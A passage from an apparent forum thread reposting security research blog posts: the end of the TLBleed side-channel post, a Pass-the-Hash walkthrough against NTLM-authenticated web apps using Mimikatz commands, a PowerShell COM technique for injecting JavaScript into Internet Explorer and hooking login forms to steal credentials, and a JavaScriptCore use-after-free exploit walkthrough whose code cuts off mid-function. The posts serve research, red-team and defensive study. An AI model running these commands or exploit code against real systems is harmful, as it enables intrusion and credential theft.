versions it has been hardened against this attack. We demonstrate that even if cache protections are in place, when this code would be safe, it would still be vulnerable from TLB leakage. The chart below shows the progression of analysis. The spy process acquires the TLB usage signal while the other hyperthread is executing the point-scalar multiplication using a secret key (this would happen e.g. when a signing operation takes place). The raw TLB signal looks noisy, but we are able to apply a machine learning technique to distinguish when a 0 or a 1 secret key bit is being processed. The latency is the raw TLB usage signal as the spy process acquires it. The shaded regions show ground truth corresponding to which secret key bit the other HT is processing. The spy process wants to decide which of the two (dup or mul, corresponding to a certain secret key bit) it is. The moving average shows the signal contains a distinguishing characteristic. The SVM classifier output shows that a SVM classifier can reliably learn to tell the difference between the two. After we capture the signal, to reconstruct the key sometimes we have to guess some values (sometimes the SVM classifier output makes no sense, sometimes it’s wrong in 1 or 2 bits), so we apply some heuristics and brute force until we guess the right key. We try this on 3 different microarchitectures and reach the following success rates, while analyzing the data from just a single TLB capture. We call it a ‘success’ if we can guess the key after a limited amount of brute force effort (see below). We try our attack on 3 different microarchitectures and report on the reliability results. The success rate is from 0 to 1, i.e. 0.998 means 99.8% success rate. This is the distribution of brute force effort needed for the 3 different cases. Brute force effort needed for 3 different microarchitectures where we eventually were successful in guessing the right key using our heuristics and brute force algorithm. RSA We also apply our technique to an older implementation of RSA, using square-and-multiply, in libgcrypt, which was written to be side-channel-resistant. (Updates since that time have improved its side channel resistance.) Its side channel resistance stems from having a near-constant control flow. TLBleed however relies on the data access pattern and can see the difference between the multiply result being used (1-bit in exponent) or not (0-bit in exponent). The error rate for a 1024-bit key was much higher than for a 256-bit EdDSA key however, and we could not brute force our way to a full reliable key recovery. We do believe that with some advanced number theoretical techniques (see paper and previous work, e.g. Cachebleed), this number of unknown bits out of 1024 can lead to a reliable key recovery with just a single capture. Error rate of 1024-bit RSA key recovery after a single capture of TLBleed data from the RSA implementation. Also: defense bypass, covert channel The paper contains more material: we implement a covert channel over the TLB, and demonstrate bypasses of cache protections. See the paper for full details. Presentations & Full Paper A copy of the paper, published at and to be presented at Usenix Security this year, as well as at a Blackhat Briefing, is online now: paper is here. [1] B. Gras, K. Razavi, H. Bos, C. Giuffrida, Translation Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks, in: USENIX Security, 2018. Acknowledgements The authors would like to thank Yuval Yarom, Colin Percival, and Taylor `Riastradh’ Campbell for early feedback on this paper, and impact consideration. Sursa: https://www.vusec.net/projects/tlbleed/
  15. Passing-the-Hash to NTLM Authenticated Web Applications Christopher Panayi, 11 July 2018 A blog post detailing the practical steps involved in executing a Pass-the-Hash (PtH) attack in Windows/Active Directory environments against web applications that use domain-backed NTLM authentication. The fundamental technique detailed here was previously discussed by Alva 'Skip' Duckwall and Chris Campbell in their excellent 2012 Blackhat talk, "Still Passing the Hash 15 Years Later…" [1][3]. Introduction One of the main advantages of a Windows Active Directory environment is that it enables enterprise-wide Single Sign-On (SSO) through the use of Kerberos or NTLM authentication. These methods are typically used to access a large variety of enterprise resources, from file shares to web applications, such as Sharepoint, OWA or custom internal web applications used for specific business processes. When considering web applications, the use of Integrated Windows Authentication (IWA) - i.e. Windows SSO for web applications - allows users to automatically authenticate to web applications using either Kerberos or NTLM authentication. It is well-known that the design of the NTLM authentication protocol allowed for Pass-the-Hash attacks - where a user is authenticated using their password hash instead of their password. Public tooling for this kind of attack has existed since around 1997 - when Paul Ashton released a modified SMB client that used a LanMan hash to access network shares [2]. Background The use of Pass-the-Hash (PtH) attacks against Windows environments has been well documented over the years. A small primer of references discussing these attacks, selected from amongst the many good resources available, follows: The official Microsoft documentation detailing how "The client computes a cryptographic hash of the password and discards the actual password." before attempting NTLM authentication. Useful for understanding why PtH for NTLM authentication is possible in Windows environments: https://docs.microsoft.com/en-us/windows/desktop/secauthn/microsoft-ntlm. Hernan Ochoa's slides discussing the original Pass-the-Hash Toolkit: https://www.coresecurity.com/system/files/publications/2016/05/Ochoa_2008-Pass-The-Hash.pdf. These describe a working means to execute PtH attacks from Windows machines that had been developed in 2000. All of the Passing-the-Hash blog. The pth-suite Linux tools are of specific interest (When they were originally released, these were coded for Backtrack Linux. Most of these tools have found a new home in Kali Linux, with one notable exception - which contributed to the writing of this blog post): https://passing-the-hash.blogspot.com/. "Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy" - A discussion of PtH for local user accounts, and the additional restrictions imposed on this form of PtH since Windows Vista: https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/. Exploiting PtH using the PsExec module in Metasploit: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/. The Github documentation for the PtH module in Mimikatz: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth. One of the specific applications of this attack that has always interested me is the ability to PtH to websites that make use of NTLM authentication. Due to the ubiquity of enterprise Windows Active Directory environments, a large number of internal corporate web applications make use of this authentication scheme to allow seamless SSO to corporate resources from company workstations. Being able to execute Pass-the-Hash attacks against these websites is therefore a useful technique for effective post-exploitation on Windows environments. The full impact of this is apparent when a full domain compromise occurs - i.e. after a complete domain hashdump for a given domain has been obtained, which contains the NT hashes associated with all employee user accounts. Pass-the-Hash, in this scenario, effectively allows the impersonation of any corporate employee, without needing to crack any password hashes, or keylog any passwords from their workstations. Meaning that even for the the most security conscious users, who might have used a 20+ character - generally uncrackable - passphrase, there would be no protection against an attacker using their compromised password hash to impersonate them on a target corporate web application. Practical PtH Attacks Against NTLM Authenticated Web Applications So, the question becomes, how would one practically carry out such an attack against an NTLM authenticated website? For a long time, performing Google searches of this topic and trawling through the results offered me no additional insight into how to use current (circa 2015-2018) tooling to execute such an attack. When considering the estimable set of Pass-the-Hash tools available in Kali Linux - pth-suite - there was a strange gap. While most of the original pth-suite tools made their way into Kali Linux in 2015, the notable exception - which I alluded to earlier - was pth-firefox, which, as the name suggests, patched the NTLM authentication code in Firefox to allow Pass-the-Hash. Since this Linux tooling was unavailable to me, I turned my attention to investigating techniques that use Mimikatz on a Windows host to perform the same attack. After having discovered a working technique myself, I recently stumbled upon pg 30 of the original "Still Passing the Hash 15 Years Later…" slides, presented at Blackhat 2012 and delivered by Alva 'Skip' Duckwall and Chris Campbell [1]. These detail a method of convincing Internet Explorer (or any browser that makes use of the built-in Windows "Internet Options" settings) to authenticate using IWA, after injecting the desired NT hash directly into memory using Hernan Ochoa's Windows Credential Editor (WCE). They give a demo of this specific technique at 18:29 of their presentation [3]. Given how long it took me to find this information, and in order to document the relevant steps for practical exploitation, the remainder of this post details how to execute this attack using Mimikatz from a Windows 10 host. The Attack Environment Setup In order to illustrate a web application that makes use of NTLM authentication, I used an Exchange 2013 server, configured to exclusively make use of IWA for Outlook Web Access (OWA). The relevant PowerShell configuration commands run on the Exchange server, from the Exchange Management Shell, were as follows: Set-OwaVirtualDirectory -Identity "owa (Default Web Site)" -FormsAuthentication $false -WindowsAuthentication $true Set-EcpVirtualDirectory -Identity "ecp (Default Web Site)" -FormsAuthentication $false -WindowsAuthentication $true Other prerequisites which were in place: This Exchange server was joined to the test.com domain. On this domain, a user, named TEST\pth, was created with a complex password and a corresponding mailbox. The NT hash of this user's password was calculated, to later be used as part of the attack. The NT hash was generated as follows: python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "Strong,hardtocrackpassword1".encode("utf-16le")).digest())' 57f5f9f45e6783753407ae3a8b13b032 After this, a recent version of Mimikatz was downloaded onto a non-domain joined Windows 10 host, which was connected to the same network as the Exchange server. In order to allow us to use the domain name of the Exchange server, instead of its IP address, the DNS server on this standalone machine was set to the Domain Controller of the test.com domain. Attack Assuming that our OWA web application was accessible on "https://exchange.test.com/owa", browsing to OWA normally would result in the following prompt: This prompt is generated, as the machine does not have any domain credentials in memory and the WWW-Authenticate header received from the website specifies that it accepts NTLM authentication. Running Mimikatz as administrator, we can start a command prompt in the context of the TEST\pth user, by using the Pass-the-Hash module in Mimikatz - sekurlsa::pth - and supplying the user's NT hash as an argument: privilege::debug sekurlsa::pth /user:pth /ntlm:57f5f9f45e6783753407ae3a8b13b032 /domain:TEST /run:cmd.exe This will not alter our local rights on the machine, but will mean that if we attempt to access any network resources from the newly spawned command prompt, it will be done in the context of our injected credentials. In order to ensure that our browser is running under the context of these injected credentials, we spawn an Internet Explorer process from this command prompt, by running "C:\Program Files\internet explorer\iexplore.exe". Inspecting the "Security Settings" for the "Local Intranet" zone in the "Internet Options" dialog, we can see that - by default - authentication is only automatic (i.e. using SSO) for websites that are present in the intranet zone. This is pictured below: Thus, in order for a Pass-the-Hash attack to work from Internet Explorer on a Windows machine, the target site must be added to the "Local Intranet" zone. Instead of adding websites to this zone individually, it is possible to use a wildcard domain, in this case "*.test.com", which will match all subdomains of "test.com". Such a configuration is pictured in the following screenshot: After this configuration, when browsing to "https://exchange.test.com/owa", the TEST\pth user is automatically authenticated through NTLM authentication and OWA then successfully loads. Potential Impact After the compromise of the domain, the ability to PtH to web applications allows for efficient, and relatively simple, impersonation of any employee, regardless of access privileges, to any company-owned web applications that support IWA. Whilst this might primarily include Microsoft web services, such as SharePoint and OWA (if IWA is specifically enabled), various custom-developed internal financial applications, including those used to pay external parties, have been seen to do the same. When looking at the industry move towards cloud environments, Active Directory Federation Services (ADFS) is commonly involved to facilitate authentication. ADFS, by default, supports IWA when an Internet Explorer user agent is provided [4]. In such a scenario, this would imply that PtH can be performed to access company resources in the cloud. Recommendations While the main purpose of this post is not to talk about the complex issue of securing a Windows Active Directory environment, and indeed, cannot do the topic justice while staying on point, some high-level considerations for addressing these attacks are provided for those interested. Some further detail, not discussed here, can be found in a previous post, Planting the Red Forest: Improving AD on the Road to ESAE. The ability to PtH in Windows environments cannot, in itself, currently be addressed. Both of the protocols that Active Directly uses for SSO inherently allow for PtH-style attacks. The most effective recommendation in this line is thus to prevent compromise of password hashes and Kerberos keys in the first place. Most importantly, this entails ensuring that Domain Controllers, Domain Administrator access, or any other means of obtaining the stored credential information within Active Directory, is not compromised, as this would directly result in the compromise of all stored password hashes and Kerberos keys. On Windows 10 and Server 2016, credential material stored in memory can be protected against credential theft attacks specifically through the use of Credential Guard. When looking at IWA for web applications in isolation, enforcing the use of Multi-Factor Authentication (MFA) during the login process can be effective. As a specific case-in-point, when ADFS is used with Office 365, initial authentication may be performed through IWA, but a second factor can be required in order to complete authentication, after which access to company resources is granted. Unfortunately, this approach cannot be used to address PtH more generally, as not all relevant protocols have support for it. SMB, for example, does not support MFA, but still provides functionality that allows for remote code execution, thus permitting attackers to move laterally inside corporate environments using PtH unhindered. P.S. A Final Note - "PtH" for Kerberos Authentication The underlying concept behind Pass-the-Hash is that once a credential store is compromised, it is possible to use the stolen stored credential material (which should never be the plaintext password!) in order to authenticate as a user, without needing to first obtain the corresponding plaintext password for that user. When referring to Microsoft's documentation concerning their implementation of the Kerberos protocol, it is described how "Kerberos Pre-Authentication" is used to obtain a Kerberos Ticket Granting Ticket (TGT). This process requires the user to send an "authenticator message" to the domain controller; this authenticator message "...is encrypted with the master key derived from the user's logon password." [5]. Later, the documentation explains that when the DC receives the TGT request, "...it looks up the user in its database, gets the associated user's master key, decrypts the preauthentication data, and evaluates the time stamp inside." [5]. This means that the key itself is used for validating authentication, not the user's plaintext password. The user's password-derived key is stored in the AD database, meaning that if this database is compromised (as happens when an attacker obtains domain administrator credentials, for example), the stored key can be recovered - along with the user's stored NT hash. Since only the stored key is needed to create a valid authenticator message, Kerberos authentication is inherently "Pass-the-Key". Alva Duckwall and Benjamin Delpy [6] called this attack "Overpass-the-Hash", and the sekurlsa::pth Mimikatz module supports crafting Kerberos Pre-Authentication requests using only Kerberos keys. The implication of this, of course, is that if a web application, or any other corporate resource, supports direct AD-backed Kerberos authentication, Overpass-the-Hash can be used for authentication against it. References [1] "Still Passing the Hash 15 Years Later: Using Keys to the Kingdom to Access Data" presentation slides - https://media.blackhat.com/bh-us-12/Briefings/Duckwall/BH_US_12_Duckwall_Campbell_Still_Passing_Slides.pdf [2] NT "Pass the Hash" with Modified SMB Client Vulnerability - http://www.securityfocus.com/bid/233/discuss Sursa: https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
  16. COM and the PowerThIEf Tuesday 10 July 2018/by Rob Maslen Recently, Component Object Model (COM) has come back in a big way, particularly with regards to it being used for persistence and lateral movement. In this blog we will run through how it can also can be used for limited process migration and JavaScript injection within Internet Explorer. We will then finish with how this was put together in our new PowerShell library Invoke-PowerThIEf and run through some situations it can aid you, the red team, in. Earlier this year I became aware of a technique that involved Junction Folders/CLSID that had been leaked in the Vault 7 dump. It was when I began looking at further applications of these that I also learned about the Component Object Model (COM) ability to interact with and automate Internet Explorer. This, of course, is not a new discovery; a lot of the functionality is well documented on sites like CodeProject. However, it hadn’t been organised into a library that would aid the red team workflow. This formed the basis of my talk “COM and the PowerThIEf” at SteelCon in Sheffield on 7th July 2018. The slides for the talk can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Steelcon-2018-com-powerthief-final.pdf The talk itself is here: Getting up to speed with COM Before we dive into this, if you are not familiar with COM then I would highly recommend the following resources. These are a selection of some of the recent excellent talks & blog posts on the subject that I would recommend if you want to know more. COM in 60 Seconds by James Forshaw – https://vimeo.com/214856542 Windows Archaeology by Casey Smith & Matt Nelson – https://www.youtube.com/watch?v=3gz1QmiMhss Lateral Movement using Excel Application and DCOM by Matt Nelson – https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ Junction Folders I first came across the Junction Folders/CLSID technique mentioned above in one of b33f’s excellent Patreon videos. As I understand it, this was first used as a method for persistence, in that if you name a folder in the format CLSID.{<CLSID>} then when you navigate to that folder, explorer will perform a lookup in the registry upon the CLSID and then run whatever COM Server has been registered. As part of his DefCon 25 WorkShop (which is worth a read, hosted at https://github.com/FuzzySecurity/DefCon25) he released a tool called Hook-InProcServer that enabled you to build the registry structure required to be used for a COM Hijack or for the JunctionFolders/CLSID technique. These were both being used as a Persistence mechanism and I began wondering if this might be possible to use as a means of Process Migration, at least into explorer.exe. Step one was to find if it was possible to programmatically navigate to one of the configured folders and – yes – it turns out that it is. In order to be able to navigate, we first need to gain access to any running instances of explorer. Windows makes this easy via the ShellWindows object: https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx Enumerating the Item property upon this object lists all the current running instances of Explorer and Internet Explorer (I must admit I thought this was curious behaviour). ShellWindows is identified by the CLSID “{9BA05972-F6A8-11CF-A442-00A0C90A8F39}”; the following PowerShell demonstrates activating it. 1 2 3 $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) The objects returned by indexing the .Item collection will be different based upon if it is an explorer and IE instance. An easy check is using the FullName which exists on both and has the name of the application, as shown here. 1 2 3 4 5 6 $fileName = [System.IO.Path]::GetFileNameWithoutExtension($shWin[0].FullName); if ($fileName.ToLower().Equals("iexplore")) { // Do your IE stuff here } This article (https://www.thewindowsclub.com/the-secret-behind-the-windows-7-godmode) from 2010 not only contains the Vault7 technique but also shows that it is possible to navigate to a CLSID using the syntax shell:::{CLSID}. Assuming that we have at least one IE window open, we are able to index the ShellWindows.Item object in order to gain access to that window (e.g. to gain access to the first IE window, use $shWin[0].Item). This will provide us an object that represents that instance of IE and is of a type called IWebBrowser2. Looking further into this type, we find in the documentation that it has a method called Navigate2. (https://msdn.microsoft.com/en-us/library/aa752134(v=vs.85).aspx). The remarks on the MSDN page for this method state that it was added to extend the Navigate method in order to “allow for shell integration”. The following code will activate ShellWindows, assuming the first window is an IE instance (this is a proof of concept) and will then attempt to navigate to the Control Panel via the CLSID for Control Panel (which can be found in the registry). 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $shWin[0].Navigate2("shell:::{ED7BA470-8E54-465E-825C-99712043E01C}", 2048) /* CLSID must be in the format "shell::{CLSID}" Second param 2048 is BrowserNavConstants value for navOpenInNewTab: https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx Further ideas on what payloads you may be able to use: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ */ The following animation shows what happens when this code is run: Control Panel being navigated to via CLSID ID: We can then see via a trace from Process Monitor that IE has looked up the CLSID and then navigated to it, eventually opening it up in explorer, which involved launching the DLL within the InProcServer registry key. If we create our own registry keys we then have a method of asking IE (or Explorer) to load a DLL for us all from the comfort of another process. We don’t always want network connections going out from Word.exe, do we? In the case of IE the DLL must be x64. There are methods of configuring the registry entries to execute script; I suggest that you look at subTee’s or bohop’s excellent work for further information. JavaScript Once a reference is obtained to an Internet Explorer window it is then possible to access the DOM of that instance. As expected, you then have full access to the page and browser. You can view and edit HTML, inject JavaScript, navigate to other tabs and show/hide the window, for example. The following code snippet demonstrates how it is possible to inject and execute JavaScript: 1 2 3 4 5 $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}") $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid) $shwin = [System.Activator]::CreateInstance($typeShwin) $parentwin = $shWin[0].Document.parentWindow $parentwin.GetType().InvokeMember("eval", [System.Reflection.BindingFlags]::InvokeMethod, $null, $parentwin, @("alert('Self XSS, meh \r\n\r\n from '+ document.location.href)")) The difference this time is that we actually have to locate the eval method on the DOM window before being able to call it. This requires using .NET’s Reflection API to locate and Invoke the method. The following shows what happens this code is run. Where is this all going? Well, despite the programming constructs and some of the techniques being well documented, there didn’t appear to be a library out there which brought it all together in order to help a red team in the following situations: The target is using a password manager, e.g. LastPass where key-logging is ineffective. The user is logged into an application and we want to be able to log them out without having to clear all browser history and cookies. The target application is in a background tab and can‘t wait for user to switch tabs. We need to view or get HTML from that page. We want to view a site from the targets IP address, without the target being aware. This led to me writing the PowerThIEf library which is now hosted at https://github.com/nettitude/Invoke-PowerThIEf. The functionality included in the initial release is as follows: DumpHtml: Retrieves HTML from the DOM, can use some selectors (but not jQuery style – yet). ExecPayload: Uses the migrate technique from earlier to launch a payload DLL in IE. HookLoginForms: Steals credentials by hooking the login form and monitoring for new windows. InvokeJS : Executes JavaScript in the window of your choice. ListUrls: Lists the urls of all currently opened tabs/windows. Navigate: Navigate to another URL. NewBackgroundTab: Creates a new tab in the background. Show/HideWindow: Shows or Hides a browsing window. Examples of usage and functionality include: Extracting HTML from a page: Logging the user out, in order to capture credentials: Using the junction folders to trigger a PoshC2 payload: Capturing credentials in transit entered via LastPass: Usage The latest Invoke-PowerThIEf documentation can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/README.md. Roadmap Further functionality is planned in the future and will include Screenshot: Screenshot all the browser windows. CookieThIEf: Steal cookies (session cookies). Refactor DOM event handling: Developing Complex C# wrapped in Powershell is not ideal. Pure C# Module Support for .Net 2.0-3.5 Download GitHub: https://github.com/nettitude/Invoke-PowerThIEf Sursa: https://labs.nettitude.com/blog/com-and-the-powerthief/
  17. Weaponization of a JavaScriptCore Vulnerability Illustrating the Progression of Advanced Exploit Primitives In Practice July 11, 2018 / Nick Burnett, Patrick Biernat, Markus Gaasedelen Software bugs come in many shapes and sizes. Sometimes, these code defects (or ‘asymmetries’) can be used to compromise the runtime integrity of software. This distinction is what helps researchers separate simple reliability issues from security vulnerabilities. At the extreme, certain vulnerabilities can be weaponized by meticulously exacerbating such asymmetries to reach a state of catastrophic software failure: arbitrary code execution. In this post, we shed some light on the process of weaponizing a vulnerability (CVE-2018-4192) in the Safari Web Browser to achieve arbitrary code execution from a single click of an unsuspecting victim. This is the most frequently discussed topic of the exploit development lifecycle, and the fourth post in our Pwn2Own 2018 series. A weaponized version of CVE-2018-4192, executing arbitrary code against JavaScriptCore in early 2018 If you haven’t been following along, you can read about how we discovered this vulnerability, followed by a walkthrough of its root cause analysis. The very first post of this series provides a top level discussion of the full exploit chain. Exploit Primitives While developing exploits against hardened or otherwise complex software, it is often necessary to use one or more vulnerabilities to build what are known as ‘exploit primitives’. In layman’s terms, a primitive refers to an action that an attacker can perform to manipulate or disclose the application runtime (eg, memory) in an unintended way. As the building blocks of an exploit, primitives are used to compromise software integrity or bypass modern security mitigations through advanced (often arbitrary) modifications of runtime memory. It is not uncommon for an exploit to string together multiple primitives towards the ultimate goal of achieving arbitrary code execution. The metamorphosis of software vulnerabilities, by Joe Bialek & Matt Miller (Slides 6-10) In the general case, it is impractical (if not impossible) to defend real world applications against an attacker who can achieve an ‘Arbitrary Read/Write’ primitive. Arbitrary R/W implies an attacker can perform any number of reads or writes to the entire address space of the application’s runtime memory. While extremely powerful, an arbitrary R/W is a luxury and not always feasible (or necessary) for an exploit. But when present, it is widely recognized as the point from which total compromise (arbitrary code execution) is inevitable. Layering Primitives From an educational perspective, the JavaScriptCore exploit that we developed for Pwn2Own 2018 is a great illustration of what layering increasingly powerful primitives looks like in practice. Starting from the discovered vulnerability, we have broken our JSC exploit down into approximately six different phases from which we nurtured each of our exploit primitives from: Forcefully free a JSArray butterfly using our race condition vulnerability (UAF) Employ the freed butterfly to gain a relative Read/Write (R/W) primitive Create generic addrof(...) and fakeobj(...) exploit primitives using the relative R/W Use generic exploit primitives to build an arbitrary R/W primitive from a faked TypedArray Leverage our arbitrary R/W primitive to overwrite a Read/Write/Execute (RWX) JIT Page Execute arbitrary code from said JIT Page Each of these steps required us to study a number of different JavaScriptCore internals, learned through careful review of the WebKit source code, existing literature, and hands-on experimentation. We will cover some of these internals in this post, but mostly in the context of how they were leveraged to build our exploit primitives. UAF Target Selection From the last post, we learned that the discovered race condition could be used to prematurely free any type of JS object by putting it in an array, and calling array.reverse() at a critical moment. This can create a malformed runtime state in which a freed object may continue to be used in what is called ‘Use-After-Free’ (UAF). We can think of this ability to incorrectly free arbitrary JS objects (or their internal allocations) as a class-specific exploit primitive against JSC. The next step would be to identify an interesting object to target (and free). In exploit development, array-like structures that maintain an internal ‘length’ field are attractive to attackers. If a malicious actor can corrupt these dynamic length fields, they are often able to index the array far outside of its usual bounds, creating a more powerful exploit primitive. Corrupting a length field in an array-like structure can allow for Out-of-Bounds array manipulations Within JavaScriptCore, a particularly interesting and accessible construct that matches the pattern depicted above is the backing butterfly of a JSArray object. The butterfly is a structure used by JSC to store JS object properties and data (such as array elements), but it also maintains a length field to bound user access to its storage. As an example, the following gdb dump + diagram shows a JSArray with its backing store (a butterfly) that we have filled with floats (represented by 0x4141414141414141 …). The green fields depict the internally managed size fields of the backing butterfly: Dumping a JSArray, and depicting the relationship with its backing butterfly From the Phrack article Attacking JavaScript Engines (Section 1.2), Saleo describes butterflies in greater detail: “Internally, JSC stores both [JS object] properties and elements in the same memory region and stores a pointer to that region in the object itself. This pointer points to the middle of the region, properties are stored to the left of it (lower addresses) and elements to the right of it. There is also a small header located just before the pointed to address that contains the length of the element vector. This concept is called a “Butterfly” since the values expand to the left and right, similar to the wings of a butterfly.” In the next section, we will attempt to forcefully free a butterfly using our vulnerability. This will leave a dangling butterfly pointer within a live JSArray, prone to malicious re-use (UAF). Forcing a Useful UAF Due to the somewhat chaotic nature of our race-condition, we will want to start our exploit (written in JavaScript) by constructing a top level array that contains a large number of simple ‘float arrays’ to better our chances of freeing at least one of them (eg, ‘winning the race’😞 print("Initializing arrays..."); var someArray1 = Array(1024); for (var i = 0; i < someArray1.length; i++) someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x41414141… ... Note that the use of floats are somewhat common in browser exploits because they are one of the few native 64bit JS types. It allows one to read or write arbitrary 64bit values (contiguously) to the backing array butterfly which will be more relevant later on in this post. With our target arrays allocated as elements of someArray1, we attempt to trigger the race condition through repeated use of array.reverse(), and stimulation of the GC (to help schedule mark-and-sweeps): ... print("Starting race..."); v = [] for (var i = 0; i < 506; i++) { for(var j = 0; j < 0x20; j++) someArray1.reverse() v.push(new String("C").repeat(0x10000)) // stimulate the GC } ... If successful, we expect to have freed one or more of the backing butterflies used by the float arrays stored within someArray1. Visually, our results will look something like this: The race condition will free free some butterflies on the heap, while leaving their JSArray cells intact While driving the race condition, the JSArray v will eventually grow its backing butterfly (through pushes) such that its backing butterfly can get allocated over some of the freed butterfly allocations. The backing butterfly for \'v\' should eventually get re-allocated over some of the freed butterflies To confirm this hypothesis, we can inspect all the lengths of arrays we targeted with our race condition. If successful, we expect to find one or more arrays with an abnormal length. This is an indication that the butterfly has been freed, and it is now a dangling pointer into memory owned by a new object (specifically, v) ... print("Checking for abnormal array lengths..."); for (var i = 0; i < someArray1.length; i++) { if(someArray1[i].length == 128) // ignore arrays of expected length... continue; print('len: 0x' + someArray1[i].length.toString(16)); } The snippets provided in this section make up a new Proof-of-Concept (PoC) called x.js. Running this short script a few times, it can be observed that the vulnerability is pretty reliably reporting multiple JSArrays with abnormal lengths. This is evidence that the backing butterflies for some of our arrays have been freed through the race condition, losing ownership of their underlying data (which now belongs to v). The PoC prints abnormal array lengths found during each run, implying potentially unbounded (malformed) arrays Explicitly, we have used the race condition to force a UAF of one or more (random) JSArray butterflies, and now the dangling butterfly pointers are pointing at unknown data. We have used our race condition to overlay a larger (living) allocation v with one or more freed butterflies. From this point, it is easy to demonstrate full control over the ‘abnormal’ array lengths teased above to achieve what is known as a ‘relative R/W’ exploit primitive. Relative R/W Primitive By filling the larger overlayed butterfly v with arbitrary data (in this case, floats), we are able to inadvertently set the ‘length’ property pointed at by one or more of the freed JSArray butterflies. The code for this is only one additional line inserted into our PoC (v.fill(...)). Putting it all together, this is approximately what we have sketched out so far: print("Initializing arrays..."); var someArray1 = Array(1024); for (var i = 0; i < someArray1.length; i++) someArray1[i] = new Array(128).fill(2261634.5098039214) // 0x41414141... print("Starting race..."); v = [] for (var i = 0; i < 506; i++) { for(var j = 0; j < 0x20; j++) someArray1.reverse() v.push(new String("C").repeat(0x10000)) // stimulate the GC } print("Filling overlapping butterfly with 0x42424242..."); v.fill(156842099844.51764) print("Checking for abnormal array lengths..."); for (var i = 0; i < someArray1.length; i++) { if(someArray1[i].length == 128) // ignore arrays of expected length... continue; print('len: 0x' + someArray1[i].length.toString(16)); } Executing this new PoC a few times, we reliably see multiple arrays claiming to have an array length of 0x42424242. A corrupted or otherwise radically incorrect array length should be alarming to any developer. The PoC reliably printing multiple arrays with an attacker-controlled (unbounded) length These ‘malformed’ (dangling) array butterflies are no longer bounded by a valid length. By pulling one of these malformed JSArray objects out of someArray1 and using them as one normally would, we can now index far past their ‘expected’ length to read or write nearby (relative) heap memory. // pull out one of the arrays with an 'abnormal' length oob_array = someArray1[i]; // write the value 0x41414141 to array index 999999 (Out-of-Bounds Write) oob_array[999999] = 0x41414141; // read memory from index 987654321 of the array (Out-of-Bounds Read) print(oob_array[987654321]); Being able to read or write Out-of-Bounds (OOB) is an extremely powerful exploit primitive. As an attacker, we can now peek and poke at other parts of runtime memory almost as if we were using a debugger. We have effectively broken the fourth wall of the application runtime. Limitations of a Relative R/W Unfortunately, there are several factors inherent to JSArrays that limit the utility of the relative R/W primitive we established in the previous section. Chief among these limitations is that the length attribute of the JSArray is stored and used as a 32-bit signed integer. This is a problem because it means we can only index ‘forwards’ out of bounds, to read or write heap data that is close behind our butterfly. This leaves a significant portion of runtime memory inaccessible to our relative R/W primitive. // relative access limited 0-0x7FFFFFFF forward from malformed array print(oob_array[-1]); // bad index (undefined) print(oob_array[0]); // okay print(oob_array[10000000]); // okay print(oob_array[0x7FFFFFFF]); // okay print(oob_array[0xFFFFFFFF]); // bad index (undefined) print(oob_array[0xFFFFFFFFFFF]); // bad index (undefined) Our next goal is to build up to an arbitrary R/W primitive such that we can touch memory anywhere in the 64bit address space of the application runtime. With JavaScriptCore, there are a few different documented techniques to achieve this level of ubiquity which we will discuss in the next section. Utility of TypedArrays In the JavaScript language specification, there is a family of objects called TypedArrays. These are array-like objects that allow JS developers to exercise more precise & efficient control over memory through lower level data types. TypedArrays were added to JavaScript to facilitate scripts which perform audio, video, and image manipulation from within the browser. It is both more natural and performant to implement these types of computations with direct memory manipulation or storage. For these same reasons, TypedArrays are often an interesting tool for exploit writers. The structure of a TypedArray (in the context of JavaScriptCore) is comprised of the following components: A JSCell, similar to all other JSObjects A unused Butterfly pointer field A pointer to the underlying ‘backing store’ for TypedArray data Backing store length Mode flags Critically, the backing store is where the user data stored into a TypedArray object is actually located in memory. If we can overwrite a TypedArray’s backing store pointer, it can be pointed at any address in memory. A diagram of the TypedArray JSObject in memory, with its underlying backing store The simplest way to achieve arbitrary R/W would be to allocate a TypedArray object somewhere after our malformed JSArray, and then use our relative R/W to modify the backing store pointer to an address of our choosing. By reading or writing to index 0 of the TypedArray, we will interface with the memory at the specified address directly. Arbitrary R/W can be achieved by overwriting the backing store pointer within a TypedArray With little time to study the JSC heap & garbage collector algorithms, it proved difficult for us to place a TypedArray near our relative R/W through pure heap feng-shui. Instead, we employed documented exploitation techniques to create a ‘fake’ TypedArray and achieve the same result. Generic Exploit Primitives Faking our own TypedArray requires more work than a lucky heap allocation, but it should be significantly more reliable (and deterministic) in practice. The ability to craft fake JS objects is dependent on two higher level ‘generic’ exploit primitives that we must build using our relative R/W: addrof(...) to provide us the memory address of any javascript object we give it fakeobj(...) to take a memory address, and return a javascript object at that location. To create our addrof(...) primitive, we first create a normal JSArray (oob_target) whose butterfly is located after our corrupted JSArray butterfly (the relative R/W). From JavaScript, we can then place any object into the first index of the array [A] and then use our relative R/W primitive oob_array to read the address of the stored object pointer (as a float) out of the nearby array (oob_target). Decoding the float in IEEE 754 form gives us the JSObject’s address in memory : // Get the address of a given JSObject prims.addrof = function(x) { 